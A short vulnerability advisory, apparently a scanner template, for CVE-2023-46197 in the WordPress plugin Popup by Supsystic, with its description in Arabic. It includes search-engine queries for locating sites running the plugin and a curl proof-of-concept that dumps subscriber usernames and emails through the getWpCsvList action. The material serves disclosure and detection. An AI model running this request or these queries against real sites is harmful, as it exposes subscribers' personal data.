
Popup by Supsystic <= 1.10.19 - ثغرة في التفويض المفقود تؤدي إلى كشف معلومات حساسة
إضافة Popup by Supsystic لووردبريس معرضة لخطر كشف معلومات حساسة في جميع الإصدارات حتى 1.10.19 عبر إجراء getWpCsvList. وهذا يسمح للمهاجمين المُوثَّقين بمستوى وصول المشترك أو أعلى باستخراج بيانات حساسة بما في ذلك عناوين البريد الإلكتروني للمشتركين.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2023-46197
metadata:
fofa-query: "wp-content/plugins/popup-by-supsystic/"
google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
shodan-query: 'vuln:CVE-2023-46197'
slug: 'popup-by-supsystic'
curl "http://wordpress.lan/?mod=subscribe&action=getWpCsvList&pl=pps"
"Username";"Email";"Activated";"PopUp ID";"Date Created"